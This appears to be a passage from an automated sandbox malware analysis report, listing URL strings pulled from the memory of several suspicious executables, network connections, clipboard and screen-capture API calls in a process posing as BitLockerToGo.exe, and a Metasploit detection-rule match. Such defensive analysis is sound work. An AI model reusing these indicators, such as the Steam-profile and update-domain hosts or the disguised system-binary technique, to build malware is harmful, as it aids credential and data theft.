            Source: z2_3yhxvvYYX1CmTdADYCHAQ.exe, 0000000D.00000002.2680451847.000001A40899D000.00000004.00000020.00020000.00000000.sdmp, z2_3yhxvvYYX1CmTdADYCHAQ.exe, 0000000D.00000003.1902278313.000001A40899D000.00000004.00000020.00020000.00000000.sdmp, z2_3yhxvvYYX1CmTdADYCHAQ.exe, 0000000D.00000003.1900520747.000001A4089C1000.00000004.00000020.00020000.00000000.sdmp, z2_3yhxvvYYX1CmTdADYCHAQ.exe, 0000000D.00000002.2680451847.000001A4089C1000.00000004.00000020.00020000.00000000.sdmp, z2_3yhxvvYYX1CmTdADYCHAQ.exe, 0000000D.00000003.1902278313.000001A4089C1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://pypi.org/project/setuptools/
            Source: z2_3yhxvvYYX1CmTdADYCHAQ.exe, 0000000D.00000003.1897524606.000001A408990000.00000004.00000020.00020000.00000000.sdmp, z2_3yhxvvYYX1CmTdADYCHAQ.exe, 0000000D.00000003.1897524606.000001A4089A3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://pypi.org/project/toml/)
            Source: z2_3yhxvvYYX1CmTdADYCHAQ.exe, 0000000D.00000003.1897524606.000001A4089A3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://pypi.org/project/tomli)
            Source: z2_3yhxvvYYX1CmTdADYCHAQ.exe, 0000000D.00000003.1897524606.000001A408990000.00000004.00000020.00020000.00000000.sdmp, z2_3yhxvvYYX1CmTdADYCHAQ.exe, 0000000D.00000003.1897524606.000001A4089A3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://pypi.org/project/tomlkit/)
            Source: z2_3yhxvvYYX1CmTdADYCHAQ.exe, 00000014.00000003.1924564794.000001E7D3015000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://pypi.org/project/typing-extensions/
            Source: z2_3yhxvvYYX1CmTdADYCHAQ.exe, 0000000D.00000003.1902278313.000001A40899D000.00000004.00000020.00020000.00000000.sdmp, z2_3yhxvvYYX1CmTdADYCHAQ.exe, 0000000D.00000003.1900520747.000001A40899D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://readthedocs.org/projects/PROJECT_RTD/badge/?version=latest
            Source: BitLockerToGo.exe, 00000013.00000003.1979512953.000000000362D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://recaptcha.n
            Source: BitLockerToGo.exe, 00000013.00000003.1979512953.000000000362D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://recaptcha.net
            Source: z2_3yhxvvYYX1CmTdADYCHAQ.exe, 00000014.00000002.2689816267.000001E7D2242000.00000004.00000020.00020000.00000000.sdmp, z2_3yhxvvYYX1CmTdADYCHAQ.exe, 00000014.00000002.2703515119.000001E7D9B20000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://requests.readthedocs.io
            Source: BitLockerToGo.exe, 00000013.00000003.1979512953.000000000362D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://s.ytimg.com;
            Source: wab.exe, 00000004.00000003.1454860522.0000000003540000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://schema.org
            Source: file.exe, 00000000.00000002.1511871135.000001DC9BF4C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://sectigo.com/CPS0
            Source: j1XaE_3LRXkWT1prPdjt1dhT.exeString found in binary or memory: https://softwaredistributiononline.com/
            Source: wab.exe, 00000004.00000003.1586959605.00000000063CC000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000004.00000003.1574838501.0000000006C55000.00000004.00000020.00020000.00000000.sdmp, j1XaE_3LRXkWT1prPdjt1dhT.exe, 0000000F.00000002.2611385938.0000000000882000.00000002.00000001.01000000.00000009.sdmpString found in binary or memory: https://softwaredistributiononline.com/update
            Source: BitLockerToGo.exe, 00000013.00000003.1979512953.000000000362D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steam.tv/
            Source: BitLockerToGo.exe, 00000013.00000003.1979512953.000000000362D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steambroadcast-test.akamaized.net
            Source: BitLockerToGo.exe, 00000013.00000003.1979512953.000000000362D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steambroadcast.akamaized.net
            Source: BitLockerToGo.exe, 00000013.00000003.1979512953.000000000362D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steambroadcastchat.akamaized.net
            Source: BitLockerToGo.exe, 00000013.00000003.1979512953.000000000362D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/
            Source: BitLockerToGo.exe, 00000013.00000003.1979956654.000000000363A000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000013.00000003.1979512953.000000000362D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/?subsection=broadcasts
            Source: BitLockerToGo.exe, 00000013.00000003.1979956654.000000000363A000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000013.00000003.1979512953.000000000362D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/discussions/
            Source: BitLockerToGo.exe, 00000013.00000002.1980992420.00000000035B3000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000013.00000003.1980120039.00000000035B3000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000013.00000003.1979956654.000000000363A000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000013.00000002.1981264592.0000000003642000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000013.00000003.1979512953.000000000362D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/linkfilter/?u=http%3A%2F%2Fwww.geonames.org
            Source: BitLockerToGo.exe, 00000013.00000003.1979512953.000000000362D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/login/home/?goto=profiles%2F76561199724331900
            Source: BitLockerToGo.exe, 00000013.00000003.1979956654.000000000363A000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000013.00000003.1979512953.000000000362D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/market/
            Source: BitLockerToGo.exe, 00000013.00000003.1979956654.000000000363A000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000013.00000003.1979512953.000000000362D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/my/wishlist/
            Source: BitLockerToGo.exe, 00000013.00000003.1979700668.00000000035D4000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000013.00000002.1981055942.00000000035D4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/profiles/76561199724331900
            Source: BitLockerToGo.exe, 00000013.00000003.1979956654.000000000363A000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000013.00000003.1979700668.00000000035B8000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000013.00000003.1979512953.000000000362D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/profiles/76561199724331900/badges
            Source: BitLockerToGo.exe, 00000013.00000002.1980992420.00000000035B3000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000013.00000003.1980120039.00000000035B3000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000013.00000003.1979956654.000000000363A000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000013.00000002.1981264592.0000000003642000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000013.00000003.1979512953.000000000362D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/profiles/76561199724331900/inventory/
            Source: BitLockerToGo.exe, 00000013.00000003.1979956654.000000000363A000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000013.00000003.1979512953.000000000362D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/workshop/
            Source: BitLockerToGo.exe, 00000013.00000003.1979512953.000000000362D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/
            Source: BitLockerToGo.exe, 00000013.00000003.1979512953.000000000362D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/;
            Source: BitLockerToGo.exe, 00000013.00000003.1979512953.000000000362D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/about/
            Source: BitLockerToGo.exe, 00000013.00000003.1979956654.000000000363A000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000013.00000003.1979512953.000000000362D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/explore/
            Source: BitLockerToGo.exe, 00000013.00000003.1979956654.000000000363A000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000013.00000003.1979700668.00000000035B8000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000013.00000002.1981264592.0000000003642000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000013.00000003.1979512953.000000000362D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/legal/
            Source: BitLockerToGo.exe, 00000013.00000003.1979956654.000000000363A000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000013.00000003.1979512953.000000000362D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/mobile
            Source: BitLockerToGo.exe, 00000013.00000003.1979956654.000000000363A000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000013.00000003.1979512953.000000000362D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/news/
            Source: BitLockerToGo.exe, 00000013.00000003.1979956654.000000000363A000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000013.00000003.1979512953.000000000362D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/points/shop/
            Source: BitLockerToGo.exe, 00000013.00000003.1979956654.000000000363A000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000013.00000003.1979512953.000000000362D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/privacy_agreement/
            Source: BitLockerToGo.exe, 00000013.00000003.1979956654.000000000363A000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000013.00000003.1979512953.000000000362D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/stats/
            Source: BitLockerToGo.exe, 00000013.00000003.1979956654.000000000363A000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000013.00000003.1979512953.000000000362D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/steam_refunds/
            Source: BitLockerToGo.exe, 00000013.00000003.1979956654.000000000363A000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000013.00000003.1979512953.000000000362D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/subscriber_agreement/
            Source: z2_3yhxvvYYX1CmTdADYCHAQ.exe, 0000000D.00000003.1902278313.000001A40899D000.00000004.00000020.00020000.00000000.sdmp, z2_3yhxvvYYX1CmTdADYCHAQ.exe, 0000000D.00000003.1900520747.000001A40899D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://tidelift.com/badges/package/pypi/zipp
            Source: z2_3yhxvvYYX1CmTdADYCHAQ.exe, 0000000D.00000003.1902278313.000001A40899D000.00000004.00000020.00020000.00000000.sdmp, z2_3yhxvvYYX1CmTdADYCHAQ.exe, 0000000D.00000003.1900520747.000001A40899D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://tidelift.com/subscription/pkg/pypi-zipp?utm_source=pypi-zipp&utm_medium=readme
            Source: z2_3yhxvvYYX1CmTdADYCHAQ.exe, 0000000D.00000003.1902278313.000001A40899D000.00000004.00000020.00020000.00000000.sdmp, z2_3yhxvvYYX1CmTdADYCHAQ.exe, 0000000D.00000003.1900520747.000001A40899D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://tidelift.com/subscription/pkg/pypi-zipp?utm_source=pypi-zipp&utm_medium=referral&utm_campaig
            Source: z2_3yhxvvYYX1CmTdADYCHAQ.exe, 0000000D.00000003.1897524606.000001A4089A3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://toml.io).
            Source: z2_3yhxvvYYX1CmTdADYCHAQ.exe, 0000000D.00000003.1897524606.000001A4089A3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://toml.io/en/v1.0.0).
            Source: wab.exe, 00000004.00000003.1454860522.0000000003540000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://use.typekit.net
            Source: wab.exe, 00000004.00000003.1454833562.0000000003546000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://use.typekit.net/af/4c4052/00000000000000003b9b3069/27/a?primer=7cdcb44be4a7db8877ffa5c0007b8
            Source: wab.exe, 00000004.00000003.1454833562.0000000003546000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://use.typekit.net/af/4c4052/00000000000000003b9b3069/27/d?primer=7cdcb44be4a7db8877ffa5c0007b8
            Source: wab.exe, 00000004.00000003.1454833562.0000000003546000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://use.typekit.net/af/4c4052/00000000000000003b9b3069/27/l?primer=7cdcb44be4a7db8877ffa5c0007b8
            Source: wab.exe, 00000004.00000003.1454833562.0000000003546000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://use.typekit.net/af/576d53/00000000000000003b9b3066/27/a?subset_id=2&fvd=n6&v=3
            Source: wab.exe, 00000004.00000003.1454833562.0000000003546000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://use.typekit.net/af/576d53/00000000000000003b9b3066/27/d?subset_id=2&fvd=n6&v=3
            Source: wab.exe, 00000004.00000003.1454833562.0000000003546000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://use.typekit.net/af/576d53/00000000000000003b9b3066/27/l?subset_id=2&fvd=n6&v=3
            Source: wab.exe, 00000004.00000003.1454833562.0000000003546000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://use.typekit.net/af/5c70f2/00000000000000003b9b3063/27/a?primer=7cdcb44be4a7db8877ffa5c0007b8
            Source: wab.exe, 00000004.00000003.1454833562.0000000003546000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://use.typekit.net/af/5c70f2/00000000000000003b9b3063/27/d?primer=7cdcb44be4a7db8877ffa5c0007b8
            Source: wab.exe, 00000004.00000003.1454833562.0000000003546000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://use.typekit.net/af/5c70f2/00000000000000003b9b3063/27/l?primer=7cdcb44be4a7db8877ffa5c0007b8
            Source: wab.exe, 00000004.00000003.1454833562.0000000003546000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://use.typekit.net/af/705e94/00000000000000003b9b3062/27/a?primer=7cdcb44be4a7db8877ffa5c0007b8
            Source: wab.exe, 00000004.00000003.1454833562.0000000003546000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://use.typekit.net/af/705e94/00000000000000003b9b3062/27/d?primer=7cdcb44be4a7db8877ffa5c0007b8
            Source: wab.exe, 00000004.00000003.1454833562.0000000003546000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://use.typekit.net/af/705e94/00000000000000003b9b3062/27/l?primer=7cdcb44be4a7db8877ffa5c0007b8
            Source: wab.exe, 00000004.00000003.1454833562.0000000003546000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://use.typekit.net/af/949f99/00000000000000003b9b3068/27/a?primer=7cdcb44be4a7db8877ffa5c0007b8
            Source: wab.exe, 00000004.00000003.1454833562.0000000003546000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://use.typekit.net/af/949f99/00000000000000003b9b3068/27/d?primer=7cdcb44be4a7db8877ffa5c0007b8
            Source: wab.exe, 00000004.00000003.1454860522.0000000003540000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://use.typekit.net/af/949f99/00000000000000003b9b3068/27/l?primer=7cdcb
            Source: wab.exe, 00000004.00000003.1454833562.0000000003546000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://use.typekit.net/af/d82519/00000000000000003b9b306a/27/a?subset_id=2&fvd=n8&v=3
            Source: wab.exe, 00000004.00000003.1454833562.0000000003546000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://use.typekit.net/af/d82519/00000000000000003b9b306a/27/d?subset_id=2&fvd=n8&v=3
            Source: wab.exe, 00000004.00000003.1454833562.0000000003546000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://use.typekit.net/af/d82519/00000000000000003b9b306a/27/l?subset_id=2&fvd=n8&v=3
            Source: wab.exe, 00000004.00000003.1454860522.0000000003540000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://use.typekit.net/qls3unz.css
            Source: wab.exe, 00000004.00000003.1668118484.000000000889D000.00000004.00000020.00020000.00000000.sdmp, RXdQ_uc4E2f9zze8GHsJCP4V.exe, 0000000E.00000000.1799143723.0000000001C1A000.00000002.00000001.01000000.0000000A.sdmpString found in binary or memory: https://vault.azure.net/mysql.database.azure.comhttps://cosmos.azure.comtext/html;
            Source: wab.exe, 00000004.00000003.1668118484.000000000889D000.00000004.00000020.00020000.00000000.sdmp, RXdQ_uc4E2f9zze8GHsJCP4V.exe, 0000000E.00000000.1799143723.0000000001C1A000.00000002.00000001.01000000.0000000A.sdmpString found in binary or memory: https://vault.azure.netusgovtrafficmanager.netvault.usgovcloudapi.nethttps://vault.azure.cn/vault.mi
            Source: wab.exe, 00000004.00000003.1454793864.0000000003564000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000004.00000003.1454793864.0000000003551000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://website-cdn.ipinfo.io
            Source: wab.exe, 00000004.00000003.1454860522.0000000003540000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://website-cdn.ipinfo.io/_next/static/chunks/framework-56eb74ff06128874.js
            Source: wab.exe, 00000004.00000003.1454860522.0000000003540000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://website-cdn.ipinfo.io/_next/static/chunks/main-f6a9a787e6515658.js
            Source: wab.exe, 00000004.00000003.1454860522.0000000003540000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://website-cdn.ipinfo.io/_next/static/chunks/pages/404-438a85aff3a4c8a8.js
            Source: wab.exe, 00000004.00000003.1454860522.0000000003540000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://website-cdn.ipinfo.io/_next/static/chunks/pages/_app-ec5587be2943f5e8.js
            Source: wab.exe, 00000004.00000003.1454860522.0000000003540000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://website-cdn.ipinfo.io/_next/static/chunks/polyfills-78c92fac7aa8fdd8.js
            Source: wab.exe, 00000004.00000003.1454860522.0000000003540000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://website-cdn.ipinfo.io/_next/static/chunks/webpack-2553cca058db625e.js
            Source: wab.exe, 00000004.00000003.1454860522.0000000003540000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://website-cdn.ipinfo.io/_next/static/css/48a60a7883388932.css
            Source: wab.exe, 00000004.00000003.1454833562.0000000003546000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000004.00000003.1454793864.0000000003551000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://website-cdn.ipinfo.io/_next/static/media/error_outline.0b8e2a07.svg
            Source: wab.exe, 00000004.00000003.1454793864.0000000003551000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://website-cdn.ipinfo.io/_next/static/media/icon-menu.1b6dca09.svg
            Source: wab.exe, 00000004.00000003.1454833562.0000000003546000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000004.00000003.1454793864.0000000003551000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://website-cdn.ipinfo.io/_next/static/media/logo-positive.0a4ba892.svg
            Source: wab.exe, 00000004.00000003.1454833562.0000000003546000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://website-cdn.ipinfo.io/_next/static/media/twitter-light.c8dff709.svg
            Source: wab.exe, 00000004.00000003.1454793864.0000000003551000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://website-cdn.ipinfo.io/_next/static/media/youtube-light.cf5a6d38.svg
            Source: wab.exe, 00000004.00000003.1454860522.0000000003540000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://website-cdn.ipinfo.io/_next/static/sha-16cdb99/_buildManifest.js
            Source: wab.exe, 00000004.00000003.1454860522.0000000003540000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://website-cdn.ipinfo.io/_next/static/sha-16cdb99/_ssgManifest.js
            Source: z2_3yhxvvYYX1CmTdADYCHAQ.exe, 0000000D.00000003.1902278313.000001A4089C1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://wheel.readthedocs.io/
            Source: z2_3yhxvvYYX1CmTdADYCHAQ.exe, 0000000D.00000002.2680451847.000001A40899D000.00000004.00000020.00020000.00000000.sdmp, z2_3yhxvvYYX1CmTdADYCHAQ.exe, 0000000D.00000003.1902278313.000001A40899D000.00000004.00000020.00020000.00000000.sdmp, z2_3yhxvvYYX1CmTdADYCHAQ.exe, 0000000D.00000003.1900520747.000001A4089C1000.00000004.00000020.00020000.00000000.sdmp, z2_3yhxvvYYX1CmTdADYCHAQ.exe, 0000000D.00000002.2680451847.000001A4089C1000.00000004.00000020.00020000.00000000.sdmp, z2_3yhxvvYYX1CmTdADYCHAQ.exe, 0000000D.00000003.1902278313.000001A4089C1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://wheel.readthedocs.io/en/stable/news.html
            Source: z2_3yhxvvYYX1CmTdADYCHAQ.exe, 00000014.00000003.1916230697.000001E7D2017000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www-cs-faculty.stanford.edu/~knuth/fasc2a.ps.gz
            Source: z2_3yhxvvYYX1CmTdADYCHAQ.exe, 00000014.00000003.1924564794.000001E7D3015000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.ams.org/journals/mcom/1988-51-184/
            Source: j1XaE_3LRXkWT1prPdjt1dhT.exe, 0000000F.00000003.2035482768.00000000031E2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
            Source: wab.exe, 00000004.00000003.1454793864.0000000003564000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.g2.com/products/ipinfo-io/widgets/stars?color=white&amp;type=read
            Source: wab.exe, 00000004.00000003.1454793864.0000000003564000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.getapp.com/business-intelligence-analytics-software/a/ipinfo/reviews/
            Source: wab.exe, 00000004.00000003.1454793864.0000000003564000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.getapp.com/ext/reviews_widget/v1/dark/ipinfo-application
            Source: BitLockerToGo.exe, 00000013.00000003.1979512953.000000000362D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com
            Source: j1XaE_3LRXkWT1prPdjt1dhT.exe, 0000000F.00000003.2035482768.00000000031E2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
            Source: BitLockerToGo.exe, 00000013.00000003.1979512953.000000000362D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/recaptcha/
            Source: BitLockerToGo.exe, 00000013.00000003.1979512953.000000000362D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.cn/recap~
            Source: z2_3yhxvvYYX1CmTdADYCHAQ.exe, 00000014.00000002.2689816267.000001E7D2242000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.python.org
            Source: z2_3yhxvvYYX1CmTdADYCHAQ.exe, 0000000D.00000002.2680451847.000001A40899D000.00000004.00000020.00020000.00000000.sdmp, z2_3yhxvvYYX1CmTdADYCHAQ.exe, 0000000D.00000003.1902278313.000001A40899D000.00000004.00000020.00020000.00000000.sdmp, z2_3yhxvvYYX1CmTdADYCHAQ.exe, 0000000D.00000003.1900520747.000001A4089C1000.00000004.00000020.00020000.00000000.sdmp, z2_3yhxvvYYX1CmTdADYCHAQ.exe, 0000000D.00000002.2680451847.000001A4089C1000.00000004.00000020.00020000.00000000.sdmp, z2_3yhxvvYYX1CmTdADYCHAQ.exe, 0000000D.00000003.1902278313.000001A4089C1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.python.org/dev/peps/pep-0427/
            Source: BitLockerToGo.exe, 00000013.00000003.1979956654.000000000363A000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000013.00000003.1979512953.000000000362D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.valvesoftware.com/en/contact?contact-person=Translation%20Team%20Feedback
            Source: BitLockerToGo.exe, 00000013.00000003.1979512953.000000000362D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com
            Source: wab.exe, 00000004.00000003.1454833562.0000000003546000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000013.00000003.1979512953.000000000362D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49722
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49721
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49720
            Source: unknownNetwork traffic detected: HTTP traffic on port 49712 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49721 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49719 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49720 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49722 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49719
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49718
            Source: unknownNetwork traffic detected: HTTP traffic on port 49713 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49717
            Source: unknownNetwork traffic detected: HTTP traffic on port 49714 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49715 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49715
            Source: unknownNetwork traffic detected: HTTP traffic on port 49717 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49714
            Source: unknownNetwork traffic detected: HTTP traffic on port 49718 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49713
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49712
            Source: unknownHTTPS traffic detected: 34.117.59.81:443 -> 192.168.2.8:49715 version: TLS 1.2
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 19_2_00433310 OpenClipboard,GetWindowLongW,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,19_2_00433310
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 19_2_00433310 OpenClipboard,GetWindowLongW,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,19_2_00433310
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 19_2_00433E1D GetDC,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,GetCurrentObject,GetObjectW,DeleteObject,CreateCompatibleDC,CreateCompatibleBitmap,SelectObject,BitBlt,19_2_00433E1D

            System Summary

            barindex
            Source: 0000000E.00000002.1975978502.0000000003812000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Metasploit Payloads - file msf.war - contents Author: Florian Roth
            Source: C:\Users\user\Documents\iofolko5\j1XaE_3LRXkWT1prPdjt1dhT.exeFile dump: service123.exe.15.dr 314613760Jump to dropped file
            Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00007FFB4AF233D00_2_00007FFB4AF233D0
            Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00007FFB4AF2B9F90_2_00007FFB4AF2B9F9
            Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00007FFB4AF2EA090_2_00007FFB4AF2EA09
            Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00007FFB4AF2B24A0_2_00007FFB4AF2B24A
            Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00007FFB4AF348E50_2_00007FFB4AF348E5
            Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00007FFB4AF209090_2_00007FFB4AF20909
            Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00007FFB4AF288880_2_00007FFB4AF28888
            Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00007FFB4AF297000_2_00007FFB4AF29700
            Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00007FFB4AF245F00_2_00007FFB4AF245F0
            Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00007FFB4AF286380_2_00007FFB4AF28638
            Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00007FFB4AF341B90_2_00007FFB4AF341B9
            Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00007FFB4AF349320_2_00007FFB4AF34932
            Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00007FFB4AFF00010_2_00007FFB4AFF0001
